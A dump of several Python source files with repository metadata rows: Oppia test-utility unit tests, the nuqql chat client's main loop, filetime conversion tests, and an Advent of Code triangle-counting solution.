            with getcwd_swap:
                SwapWithCheckTestClass.getcwd_function_without_args()
    def test_assert_raises_with_error_message(self):
        """assertRaises is forbidden in favor of assertRaisesRegexp."""
        def mock_exception_func():
            raise Exception()
        with self.assertRaisesRegexp(
            NotImplementedError,
            'self.assertRaises should not be used in these tests. Please use '
            'self.assertRaisesRegexp instead.'):
            self.assertRaises(Exception, mock_exception_func)
    def test_assert_raises_regexp_with_empty_string(self):
        """assertRaisesRegexp rejects an empty expected-regexp string."""
        def mock_exception_func():
            raise Exception()
        with self.assertRaisesRegexp(
            Exception,
            'Please provide a sufficiently strong regexp string to '
            'validate that the correct error is being raised.'):
            self.assertRaisesRegexp(Exception, '', mock_exception_func)
class EmailMockTests(test_utils.EmailTestBase):
    """Class for testing EmailTestBase."""
    def test_override_run_swaps_contexts(self):
        """Test that the current_function
        email_services.send_email_to_recipients() is correctly swapped to its
        mock version when the testbase extends EmailTestBase.
        """
        referenced_function = getattr(
            email_services, 'send_email_to_recipients')
        correct_function = getattr(self, '_send_email_to_recipients')
        self.assertEqual(referenced_function, correct_function)
    def test_mock_send_email_to_recipients_sends_correct_emails(self):
        """Test sending email to recipients using mock adds the correct objects
        to emails_dict.
        """
        # Subject, plaintext and HTML bodies are UTF-8 encoded byte strings
        # containing non-ASCII characters, to exercise encoding handling.
        self._send_email_to_recipients(
            'a@a.com',
            ['b@b.com'],
            (
                'Hola 😂 - invitation to collaborate'
                .encode(encoding='utf-8')),
            'plaintext_body 😂'.encode(encoding='utf-8'),
            'Hi abc,<br> 😂'.encode(encoding='utf-8'),
            bcc=['c@c.com'],
            reply_to='abc',
            recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}})
        messages = self._get_sent_email_messages(
            'b@b.com')
        all_messages = self._get_all_sent_email_messages()
        # Exactly one message was recorded, keyed by the recipient address.
        self.assertEqual(len(messages), 1)
        self.assertEqual(len(all_messages), 1)
        self.assertEqual(all_messages['b@b.com'], messages)
        # The recorded message preserves the original encoded contents.
        self.assertEqual(
            messages[0].subject,
            'Hola 😂 - invitation to collaborate'.encode(encoding='utf-8'))
        self.assertEqual(
            messages[0].body,
            'plaintext_body 😂'.encode(encoding='utf-8'))
        self.assertEqual(
            messages[0].html,
            'Hi abc,<br> 😂'.encode(encoding='utf-8'))
        self.assertEqual(messages[0].bcc, 'c@c.com')
class SwapWithCheckTestClass(python_utils.OBJECT):
    """Collection of dummy callables exercised by the swap_with_checks
    tests in TestUtilsTests.
    """
    @classmethod
    def getcwd_function_without_args(cls):
        """Call os.getcwd exactly once, with no arguments."""
        os.getcwd()
    @classmethod
    def empty_function_without_args(cls):
        """Do nothing at all."""
        return None
    @classmethod
    def functions_with_args(cls):
        """Call os.getenv twice and os.path.join once, positionally."""
        os.getenv('123')
        os.getenv('456')
        os.path.join('first', 'second')
    @classmethod
    def functions_with_kwargs(cls):
        """Call os.getenv twice, passing default as a keyword argument."""
        os.getenv('123', default='456')
        os.getenv('678', default='900')
| 37.365714 | 80 | 0.639586 |
from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import os
import re
from constants import constants
from core import jobs
from core.domain import auth_domain
from core.domain import param_domain
from core.domain import taskqueue_services
from core.platform import models
from core.tests import test_utils
import python_utils
import mock
import webapp2
exp_models, = models.Registry.import_models([models.NAMES.exploration])
email_services = models.Registry.import_email_services()
class FunctionWrapperTests(test_utils.GenericTestBase):
def test_wrapper_calls_subclass_methods(self):
order = []
testcase = self
class MockWrapper(test_utils.FunctionWrapper):
def pre_call_hook(self, args):
order.append('before')
testcase.assertEqual(args.get('posarg'), 'foo')
testcase.assertEqual(args.get('kwarg'), 'bar')
def post_call_hook(self, args, result):
order.append('after')
testcase.assertEqual(result, 'foobar')
testcase.assertEqual(args.get('posarg'), 'foo')
testcase.assertEqual(args.get('kwarg'), 'bar')
def mock_function(posarg, kwarg):
order.append('call')
return posarg + kwarg
wrapped = MockWrapper(mock_function)
self.assertEqual(wrapped('foo', kwarg='bar'), 'foobar')
self.assertEqual(order, ['before', 'call', 'after'])
def test_wrapper_calls_passed_method(self):
data = {}
class MockClass(python_utils.OBJECT):
def __init__(self, num1):
self.num1 = num1
def mock_method(self, num2):
data['value'] = self.num1 + num2
return (self.num1 + num2) * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_method)
with self.swap(MockClass, 'mock_method', wrapped):
val = MockClass('foo').mock_method('bar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_class_method(self):
data = {}
class MockClass(python_utils.OBJECT):
str_attr = 'foo'
@classmethod
def mock_classmethod(cls, num):
data['value'] = cls.str_attr + num
return (cls.str_attr + num) * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_classmethod)
with self.swap(MockClass, 'mock_classmethod', wrapped):
val = MockClass.mock_classmethod('bar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_static_method(self):
data = {}
class MockClass(python_utils.OBJECT):
@staticmethod
def mock_staticmethod(num):
data['value'] = num
return num * 2
wrapped = test_utils.FunctionWrapper(MockClass.mock_staticmethod)
with self.swap(MockClass, 'mock_staticmethod', wrapped):
val = MockClass.mock_staticmethod('foobar')
self.assertEqual(val, 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_wrapper_calls_passed_lambdas(self):
data = {}
def mock_function_with_side_effect(num):
data['value'] = num
return num
mock_lambda = lambda x: mock_function_with_side_effect(x) * 2
wrapped = test_utils.FunctionWrapper(mock_lambda)
self.assertEqual(wrapped('foobar'), 'foobarfoobar')
self.assertEqual(data.get('value'), 'foobar')
def test_pre_call_hook_does_nothing(self):
function = lambda x: x ** 2
wrapped = test_utils.FunctionWrapper(function)
self.assertIsNone(wrapped.pre_call_hook('args'))
class AuthServicesStubTests(test_utils.GenericTestBase):
EMAIL = 'user@test.com'
def setUp(self):
super(AuthServicesStubTests, self).setUp()
self.stub = test_utils.AuthServicesStub()
def test_get_auth_claims_from_request(self):
request = webapp2.Request.blank('/')
self.assertIsNone(self.stub.get_auth_claims_from_request(request))
with self.login_context(self.EMAIL):
self.assertEqual(
self.stub.get_auth_claims_from_request(request),
auth_domain.AuthClaims(
self.get_auth_id_from_email(self.EMAIL), self.EMAIL, False))
with self.super_admin_context():
self.assertEqual(
self.stub.get_auth_claims_from_request(request),
auth_domain.AuthClaims(
self.get_auth_id_from_email(self.SUPER_ADMIN_EMAIL),
self.SUPER_ADMIN_EMAIL,
True))
self.assertIsNone(self.stub.get_auth_claims_from_request(request))
def test_get_association_that_is_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
def test_get_association_that_is_missing(self):
self.assertIsNone(self.stub.get_user_id_from_auth_id('does_not_exist'))
self.assertIsNone(self.stub.get_auth_id_from_user_id('does_not_exist'))
def test_get_multi_associations_with_all_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid2', 'uid2'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid3', 'uid3'))
self.assertEqual(
self.stub.get_multi_user_ids_from_auth_ids(
['aid1', 'aid2', 'aid3']),
['uid1', 'uid2', 'uid3'])
self.assertEqual(
self.stub.get_multi_auth_ids_from_user_ids(
['uid1', 'uid2', 'uid3']),
['aid1', 'aid2', 'aid3'])
def test_get_multi_associations_with_one_missing(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid3', 'uid3'))
self.assertEqual(
self.stub.get_multi_user_ids_from_auth_ids(
['aid1', 'aid2', 'aid3']),
['uid1', None, 'uid3'])
self.assertEqual(
self.stub.get_multi_auth_ids_from_user_ids(
['uid1', 'uid2', 'uid3']),
['aid1', None, 'aid3'])
def test_associate_auth_id_with_user_id_without_collision(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
def test_associate_auth_id_with_user_id_with_collision_raises(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
with self.assertRaisesRegexp(Exception, 'already associated'):
self.stub.associate_auth_id_with_user_id(
auth_domain.AuthIdUserIdPair('aid', 'uid'))
def test_associate_multi_auth_ids_with_user_ids_without_collisions(self):
self.stub.associate_multi_auth_ids_with_user_ids(
[auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
self.assertEqual(
[self.stub.get_user_id_from_auth_id('aid1'),
self.stub.get_user_id_from_auth_id('aid2'),
self.stub.get_user_id_from_auth_id('aid3')],
['uid1', 'uid2', 'uid3'])
def test_associate_multi_auth_ids_with_user_ids_with_collision_raises(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid1', 'uid1'))
with self.assertRaisesRegexp(Exception, 'already associated'):
self.stub.associate_multi_auth_ids_with_user_ids(
[auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
    def test_present_association_is_not_considered_to_be_deleted(self):
        # An existing association must report "not deleted".
        self.stub.associate_auth_id_with_user_id(
            auth_domain.AuthIdUserIdPair('aid', 'uid'))
        self.assertFalse(
            self.stub.verify_external_auth_associations_are_deleted('uid'))
    def test_missing_association_is_considered_to_be_deleted(self):
        # A user ID that was never associated counts as fully deleted.
        self.assertTrue(self.stub.verify_external_auth_associations_are_deleted(
            'does_not_exist'))
    def test_delete_association_when_it_is_present(self):
        # Deleting an existing association flips the deleted-check from
        # False to True.
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid', 'uid'))
        self.assertFalse(
            self.stub.verify_external_auth_associations_are_deleted('uid'))
        self.stub.delete_external_auth_associations('uid')
        self.assertTrue(
            self.stub.verify_external_auth_associations_are_deleted('uid'))
    def test_delete_association_when_it_is_missing_does_not_raise(self):
        # Deletion is idempotent: unknown IDs are a silent no-op.
        self.stub.delete_external_auth_associations('does_not_exist')
class CallCounterTests(test_utils.GenericTestBase):
    """Tests for the CallCounter wrapper provided by test_utils."""

    def test_call_counter_counts_the_number_of_times_a_function_gets_called(
            self):
        def square(x):
            return x ** 2
        counted_square = test_utils.CallCounter(square)
        # A freshly wrapped function has never been invoked.
        self.assertEqual(counted_square.times_called, 0)
        for call_index in python_utils.RANGE(5):
            # Each call passes through to the wrapped function...
            self.assertEqual(counted_square(call_index), call_index ** 2)
            # ...and increments the counter by exactly one.
            self.assertEqual(counted_square.times_called, call_index + 1)
class FailingFunctionTests(test_utils.GenericTestBase):
    """Tests for the FailingFunction helper provided by test_utils."""

    def test_failing_function_never_succeeds_when_n_is_infinity(self):
        class MockError(Exception):
            pass

        def square(x):
            return x ** 2

        always_failing = test_utils.FailingFunction(
            square, MockError('Dummy Exception'),
            test_utils.FailingFunction.INFINITY)
        # With INFINITY, the wrapper keeps raising no matter how often
        # it is called.
        for attempt in python_utils.RANGE(20):
            with self.assertRaisesRegexp(MockError, 'Dummy Exception'):
                always_failing(attempt)

    def test_failing_function_raises_error_with_invalid_num_tries(self):
        class MockError(Exception):
            pass

        def square(x):
            return x ** 2

        # Negative retry counts are rejected at construction time.
        with self.assertRaisesRegexp(
            ValueError,
            'num_tries_before_success should either be an integer greater than '
            'or equal to 0, or FailingFunction.INFINITY'):
            test_utils.FailingFunction(square, MockError, -1)
class FailingMapReduceJobManager(jobs.BaseMapReduceJobManager):
    """A deliberately broken MapReduce job used to exercise failure paths.

    NOTE(review): map() takes no input argument; presumably the MR
    framework's call with an entity fails — confirm against the framework.
    """
    @classmethod
    def entity_classes_to_map_over(cls):
        # No entities to map over.
        return []
    @classmethod
    def map(cls):
        pass
class TestUtilsTests(test_utils.GenericTestBase):
    """Tests for the helper utilities in test_utils itself: job failure
    reporting, static-asset helpers, param-dict helpers, logging capture,
    and the swap_to_always_*/swap_with_checks context managers.
    """
    def test_failing_job(self):
        self.assertIsNone(FailingMapReduceJobManager.map())
        job_id = FailingMapReduceJobManager.create_new()
        FailingMapReduceJobManager.enqueue(
            job_id, taskqueue_services.QUEUE_NAME_DEFAULT)
        self.assertEqual(
            self.count_jobs_in_mapreduce_taskqueue(None), 1)
        self.assertRaisesRegexp(
            RuntimeError, 'MapReduce task failed: Task<.*>',
            self.process_and_flush_pending_mapreduce_tasks)
    def test_get_static_asset_url(self):
        asset_url = self.get_static_asset_url('/images/subjects/Lightbulb.svg')
        self.assertEqual(asset_url, '/assets/images/subjects/Lightbulb.svg')
    def test_get_static_asset_filepath_with_prod_mode_on(self):
        with self.swap(constants, 'DEV_MODE', False):
            filepath = self.get_static_asset_filepath()
            self.assertEqual(filepath, 'build')
    def test_cannot_get_updated_param_dict_with_invalid_param_name(self):
        # The change list refers to param 'a', but only 'b' is declared.
        param_change_list = [
            param_domain.ParamChange(
                'a', 'Copier', {
                    'value': 'firstValue', 'parse_with_jinja': False
                }
            )
        ]
        exp_param_specs = {
            'b': param_domain.ParamSpec('UnicodeString'),
        }
        with self.assertRaisesRegexp(Exception, 'Parameter a not found'):
            self.get_updated_param_dict(
                {}, param_change_list, exp_param_specs)
    def test_cannot_save_new_linear_exp_with_no_state_name(self):
        with self.assertRaisesRegexp(
            ValueError, 'must provide at least one state name'):
            self.save_new_linear_exp_with_state_names_and_interactions(
                'exp_id', 'owner_id', [], ['interaction_id'])
    def test_cannot_save_new_linear_exp_with_no_interaction_id(self):
        with self.assertRaisesRegexp(
            ValueError, 'must provide at least one interaction type'):
            self.save_new_linear_exp_with_state_names_and_interactions(
                'exp_id', 'owner_id', ['state_name'], [])
    def test_cannot_perform_delete_json_with_non_dict_params(self):
        with self.assertRaisesRegexp(
            Exception, 'Expected params to be a dict'):
            self.delete_json('random_url', params='invalid_params')
    def test_cannot_get_response_with_non_dict_params(self):
        with self.assertRaisesRegexp(
            Exception, 'Expected params to be a dict'):
            self.get_response_without_checking_for_errors(
                'random_url', [200], params='invalid_params')
    def test_capture_logging(self):
        # Only log records emitted inside the context manager are captured;
        # plain prints are ignored.
        logging.info('0')
        with self.capture_logging() as logs:
            logging.info('1')
            logging.debug('2')
            logging.warn('3')
            logging.error('4')
            python_utils.PRINT('5')
        logging.info('6')
        self.assertEqual(logs, ['1', '2', '3', '4'])
    def test_capture_logging_with_min_level(self):
        # min_level filters out records below WARN.
        logging.info('0')
        with self.capture_logging(min_level=logging.WARN) as logs:
            logging.info('1')
            logging.debug('2')
            logging.warn('3')
            logging.error('4')
            python_utils.PRINT('5')
        logging.error('6')
        self.assertEqual(logs, ['3', '4'])
    def test_swap_to_always_return_without_value_uses_none(self):
        obj = mock.Mock()
        obj.func = lambda: obj
        self.assertIs(obj.func(), obj)
        with self.swap_to_always_return(obj, 'func'):
            self.assertIsNone(obj.func())
    def test_swap_to_always_return_with_value(self):
        obj = mock.Mock()
        obj.func = lambda: 0
        self.assertEqual(obj.func(), 0)
        with self.swap_to_always_return(obj, 'func', value=123):
            self.assertEqual(obj.func(), 123)
    def test_swap_to_always_raise_without_error_uses_empty_exception(self):
        obj = mock.Mock()
        obj.func = lambda: None
        self.assertIsNone(obj.func())
        with self.swap_to_always_raise(obj, 'func'):
            try:
                obj.func()
            except Exception as e:
                # The default raised error is a bare, message-less Exception.
                self.assertIs(type(e), Exception)
                self.assertEqual(python_utils.UNICODE(e), '')
            else:
                self.fail(msg='obj.func() did not raise an Exception')
    def test_swap_to_always_raise_with_error(self):
        obj = mock.Mock()
        obj.func = lambda: python_utils.divide(1, 0)
        self.assertRaisesRegexp(
            ZeroDivisionError, 'integer division or modulo by zero', obj.func)
        with self.swap_to_always_raise(obj, 'func', error=ValueError('abc')):
            self.assertRaisesRegexp(ValueError, 'abc', obj.func)
    def test_swap_with_check_on_method_called(self):
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
        with getcwd_swap:
            SwapWithCheckTestClass.getcwd_function_without_args()
    def test_swap_with_check_on_called_failed(self):
        # The swapped function is never called, so exiting the context
        # manager must raise.
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
        with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
            with getcwd_swap:
                SwapWithCheckTestClass.empty_function_without_args()
    def test_swap_with_check_on_not_called(self):
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(
            os, 'getcwd', mock_getcwd, called=False)
        with getcwd_swap:
            SwapWithCheckTestClass.empty_function_without_args()
    def test_swap_with_check_on_not_called_failed(self):
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(
            os, 'getcwd', mock_getcwd)
        with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
            with getcwd_swap:
                SwapWithCheckTestClass.empty_function_without_args()
    def test_swap_with_check_on_expected_args(self):
        def mock_getenv(unused_env):
            return
        def mock_join(*unused_args):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
        join_swap = self.swap_with_checks(
            os.path, 'join', mock_join, expected_args=[('first', 'second')])
        with getenv_swap, join_swap:
            SwapWithCheckTestClass.functions_with_args()
    def test_swap_with_check_on_expected_args_failed_on_run_sequence(self):
        # expected_args is order-sensitive: swapping the two calls fails.
        def mock_getenv(unused_env):
            return
        def mock_join(*unused_args):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_args=[('456',), ('123',)])
        join_swap = self.swap_with_checks(
            os.path, 'join', mock_join, expected_args=[('first', 'second')])
        with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
            with getenv_swap, join_swap:
                SwapWithCheckTestClass.functions_with_args()
    def test_swap_with_check_on_expected_args_failed_on_wrong_args_number(self):
        def mock_getenv(unused_env):
            return
        def mock_join(*unused_args):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
        join_swap = self.swap_with_checks(
            os.path, 'join', mock_join, expected_args=[
                ('first', 'second'), ('third', 'forth')])
        with self.assertRaisesRegexp(AssertionError, r'join'):
            with getenv_swap, join_swap:
                SwapWithCheckTestClass.functions_with_args()
    def test_swap_with_check_on_expected_kwargs(self):
        def mock_getenv(key, default):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv,
            expected_args=[('123',), ('678',)],
            expected_kwargs=[{'default': '456'}, {'default': '900'}])
        with getenv_swap:
            SwapWithCheckTestClass.functions_with_kwargs()
    def test_swap_with_check_on_expected_kwargs_failed_on_wrong_numbers(self):
        # Three expected kwargs dicts, but only two calls are made.
        def mock_getenv(key, default):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_kwargs=[
                {'key': '123', 'default': '456'},
                {'key': '678', 'default': '900'},
                {'key': '678', 'default': '900'},
            ])
        with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
            with getenv_swap:
                SwapWithCheckTestClass.functions_with_kwargs()
    def test_swap_with_check_on_capature_exception_raised_by_tested_function(
            self):
        # Exceptions raised inside the swapped function propagate out.
        def mock_getcwd():
            raise ValueError('Exception raised from getcwd()')
        getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
        with self.assertRaisesRegexp(
            ValueError, re.escape('Exception raised from getcwd()')
        ):
            with getcwd_swap:
                SwapWithCheckTestClass.getcwd_function_without_args()
    def test_assert_raises_with_error_message(self):
        def mock_exception_func():
            raise Exception()
        with self.assertRaisesRegexp(
            NotImplementedError,
            'self.assertRaises should not be used in these tests. Please use '
            'self.assertRaisesRegexp instead.'):
            self.assertRaises(Exception, mock_exception_func)
    def test_assert_raises_regexp_with_empty_string(self):
        def mock_exception_func():
            raise Exception()
        with self.assertRaisesRegexp(
            Exception,
            'Please provide a sufficiently strong regexp string to '
            'validate that the correct error is being raised.'):
            self.assertRaisesRegexp(Exception, '', mock_exception_func)
class EmailMockTests(test_utils.EmailTestBase):
    """Tests for the email-mocking behaviour provided by EmailTestBase."""
    def test_override_run_swaps_contexts(self):
        # EmailTestBase must have swapped the real sender for its mock.
        referenced_function = getattr(
            email_services, 'send_email_to_recipients')
        correct_function = getattr(self, '_send_email_to_recipients')
        self.assertEqual(referenced_function, correct_function)
    def test_mock_send_email_to_recipients_sends_correct_emails(self):
        # Subject/body/html contain non-ASCII characters to exercise the
        # utf-8 handling of the mock sender.
        self._send_email_to_recipients(
            'a@a.com',
            ['b@b.com'],
            (
                'Hola 😂 - invitation to collaborate'
                .encode(encoding='utf-8')),
            'plaintext_body 😂'.encode(encoding='utf-8'),
            'Hi abc,<br> 😂'.encode(encoding='utf-8'),
            bcc=['c@c.com'],
            reply_to='abc',
            recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}})
        messages = self._get_sent_email_messages(
            'b@b.com')
        all_messages = self._get_all_sent_email_messages()
        self.assertEqual(len(messages), 1)
        self.assertEqual(len(all_messages), 1)
        self.assertEqual(all_messages['b@b.com'], messages)
        self.assertEqual(
            messages[0].subject,
            'Hola 😂 - invitation to collaborate'.encode(encoding='utf-8'))
        self.assertEqual(
            messages[0].body,
            'plaintext_body 😂'.encode(encoding='utf-8'))
        self.assertEqual(
            messages[0].html,
            'Hi abc,<br> 😂'.encode(encoding='utf-8'))
        self.assertEqual(messages[0].bcc, 'c@c.com')
class SwapWithCheckTestClass(python_utils.OBJECT):
    """Fixture whose exact os.* call sequences are asserted by the
    swap_with_checks tests in TestUtilsTests — do not reorder the calls.
    """
    @classmethod
    def getcwd_function_without_args(cls):
        os.getcwd()
    @classmethod
    def empty_function_without_args(cls):
        pass
    @classmethod
    def functions_with_args(cls):
        os.getenv('123')
        os.getenv('456')
        os.path.join('first', 'second')
    @classmethod
    def functions_with_kwargs(cls):
        os.getenv('123', default='456')
        os.getenv('678', default='900')
| true | true |
f722ff12e66d16156c8166bda9a96d2df4ee4890 | 1,298 | py | Python | nuqql/main.py | hwipl/nuqql | 410ea5bd42e455d656b1b34612c3b0d5a0b433ef | [
"MIT"
] | 3 | 2019-04-15T18:33:36.000Z | 2019-04-21T19:18:10.000Z | nuqql/main.py | hwipl/nuqql | 410ea5bd42e455d656b1b34612c3b0d5a0b433ef | [
"MIT"
] | 15 | 2019-04-15T18:35:56.000Z | 2019-09-14T08:24:32.000Z | nuqql/main.py | hwipl/nuqql | 410ea5bd42e455d656b1b34612c3b0d5a0b433ef | [
"MIT"
] | 1 | 2019-06-16T12:00:30.000Z | 2019-06-16T12:00:30.000Z | """
Main part of nuqql.
"""
import logging
import os
import signal
import nuqql.backend
import nuqql.config
import nuqql.ui
logger = logging.getLogger(__name__)
# main loop of nuqql
def main_loop() -> str:
    """
    Main loop of nuqql.

    Starts all backends, then polls UI input and network events until
    handle_input() signals quit. Backends are always stopped on exit.
    Returns an empty string (passed back to the UI layer).
    """
    logger.debug("entering main loop")
    try:
        # init and start all backends; deliberately inside the try so that
        # a partial start-up is still cleaned up by stop_backends()
        nuqql.backend.start_backends()
        # loop as long as user does not quit
        while nuqql.ui.handle_input():
            # update buddies
            nuqql.backend.update_buddies()
            # handle network input
            nuqql.backend.handle_network()
    finally:
        # shut down backends
        nuqql.backend.stop_backends()
    # quit nuqql
    return ""
def _set_esc_delay() -> None:
    """
    Configure ESC delay for curses.

    Uses setdefault so an ESCDELAY value already present in the
    environment takes precedence over the configured one.
    """
    os.environ.setdefault("ESCDELAY", nuqql.config.get("escdelay"))
# main entry point
def run() -> None:
    """
    Main entry point of nuqql.

    Order matters: arguments are parsed and ESCDELAY is set before
    curses is initialised by nuqql.ui.init().
    """
    # does not go to nuqql log file
    logger.debug("starting nuqql")
    # parse command line arguments
    nuqql.config.parse_args()
    # ignore SIGINT
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    # configure esc delay for curses
    _set_esc_delay()
    # initialize ui and run main_loop
    nuqql.ui.init(main_loop)
| 18.542857 | 67 | 0.62943 |
import logging
import os
import signal
import nuqql.backend
import nuqql.config
import nuqql.ui
logger = logging.getLogger(__name__)
def main_loop() -> str:
logger.debug("entering main loop")
try:
nuqql.backend.start_backends()
while nuqql.ui.handle_input():
nuqql.backend.update_buddies()
nuqql.backend.handle_network()
finally:
nuqql.backend.stop_backends()
return ""
def _set_esc_delay() -> None:
os.environ.setdefault("ESCDELAY", nuqql.config.get("escdelay"))
def run() -> None:
logger.debug("starting nuqql")
nuqql.config.parse_args()
signal.signal(signal.SIGINT, signal.SIG_IGN)
_set_esc_delay()
nuqql.ui.init(main_loop)
| true | true |
f722ff3452399253037f413b93a7d0b032a1be3d | 672 | py | Python | tests/test_main.py | jleclanche/filetime | 4e3f7925e04713a507adcfe7e8a3ef20601ef5e4 | [
"CC0-1.0"
] | 3 | 2019-05-27T07:19:11.000Z | 2021-12-13T10:43:19.000Z | tests/test_main.py | jleclanche/filetime | 4e3f7925e04713a507adcfe7e8a3ef20601ef5e4 | [
"CC0-1.0"
] | null | null | null | tests/test_main.py | jleclanche/filetime | 4e3f7925e04713a507adcfe7e8a3ef20601ef5e4 | [
"CC0-1.0"
] | null | null | null | from datetime import datetime
from filetime import from_datetime, to_datetime, utc
def test_from_datetime():
assert from_datetime(datetime(2009, 7, 25, 23, 0)) == 128930364000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0, tzinfo=utc)) == 116444736000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0)) == 116444736000000000
assert from_datetime(datetime(2009, 7, 25, 23, 0, 0, 100)) == 128930364000001000
def test_to_datetime():
assert to_datetime(116444736000000000) == datetime(1970, 1, 1, 0, 0)
assert to_datetime(128930364000000000) == datetime(2009, 7, 25, 23, 0)
assert to_datetime(128930364000001000) == datetime(2009, 7, 25, 23, 0, 0, 100)
| 39.529412 | 83 | 0.745536 | from datetime import datetime
from filetime import from_datetime, to_datetime, utc
def test_from_datetime():
assert from_datetime(datetime(2009, 7, 25, 23, 0)) == 128930364000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0, tzinfo=utc)) == 116444736000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0)) == 116444736000000000
assert from_datetime(datetime(2009, 7, 25, 23, 0, 0, 100)) == 128930364000001000
def test_to_datetime():
assert to_datetime(116444736000000000) == datetime(1970, 1, 1, 0, 0)
assert to_datetime(128930364000000000) == datetime(2009, 7, 25, 23, 0)
assert to_datetime(128930364000001000) == datetime(2009, 7, 25, 23, 0, 0, 100)
| true | true |
f722ffb63bb529cdb1455c71ea254e0a5d9284e9 | 1,988 | py | Python | day3/solution.py | hejnal/advent-of-code | bc16ea8f34914a5c384705cf41784e85ba145e78 | [
"Apache-2.0"
] | null | null | null | day3/solution.py | hejnal/advent-of-code | bc16ea8f34914a5c384705cf41784e85ba145e78 | [
"Apache-2.0"
] | null | null | null | day3/solution.py | hejnal/advent-of-code | bc16ea8f34914a5c384705cf41784e85ba145e78 | [
"Apache-2.0"
] | null | null | null | #!/bin/python
def is_valid_triangle(edges):
    """Return True iff the three edge lengths can form a non-degenerate triangle.

    The triangle inequality only needs checking for the largest edge: after
    sorting, a + b > c implies the other two (strict) inequalities.
    """
    assert len(edges) == 3, "input should have 3 edges"
    a, b, c = sorted(edges)
    return a + b > c
def main():
    """Solve Advent of Code day 3: count valid triangles read from input.txt."""
    # Sanity checks on the triangle predicate before processing input.
    response = is_valid_triangle([5, 10, 25])
    assert response == False, "it should be 0"
    response = is_valid_triangle([4, 5, 7])
    assert response == True, "it should be 1"
    # part 1: each input row is one candidate triangle
    num_triangles = 0
    with open("input.txt", "r") as f:
        while True:
            line = f.readline()
            # blank line or EOF terminates the scan
            if line == "\n" or line == "":
                break
            edges = list(map(lambda x: int(x), line.strip().split()))
            num_triangles = num_triangles + (1 if is_valid_triangle(edges) else 0)
    print("Part1: Total number of triangles is: {}".format(num_triangles))
    # part 2: triangles are read column-wise in groups of three rows
    num_triangles = 0
    processed_edges = []
    with open("input.txt", "r") as f:
        while True:
            line = f.readline()
            # NOTE(review): the terminating blank/EOF line is appended (as an
            # empty list) before the break; harmless because the break happens
            # before the group-of-three check — confirm if refactoring.
            processed_edges.append(list(map(lambda x: int(x), line.strip().split())))
            if line == "\n" or line == "":
                break
            if (len(processed_edges) % 3 == 0):
                # transpose the 3x3 block: one triangle per column
                edges_first = [processed_edges[0][0], processed_edges[1][0], processed_edges[2][0]]
                edges_second = [processed_edges[0][1], processed_edges[1][1], processed_edges[2][1]]
                edges_third = [processed_edges[0][2], processed_edges[1][2], processed_edges[2][2]]
                num_triangles = num_triangles + (1 if is_valid_triangle(edges_first) else 0)
                num_triangles = num_triangles + (1 if is_valid_triangle(edges_second) else 0)
                num_triangles = num_triangles + (1 if is_valid_triangle(edges_third) else 0)
                processed_edges = []
    print("Part2: Total number of triangles is: {}".format(num_triangles))
# Run the puzzle solution when executed as a script.
if __name__ == "__main__":
    main()
def is_valid_triangle(edges):
assert len(edges) == 3, "input should have 3 edges"
if edges[0] + edges[1] > edges[2] and edges[0] + edges[2] > edges[1] and edges[1] + edges[2] > edges[0]:
return True
else:
return False
def main():
response = is_valid_triangle([5, 10, 25])
assert response == False, "it should be 0"
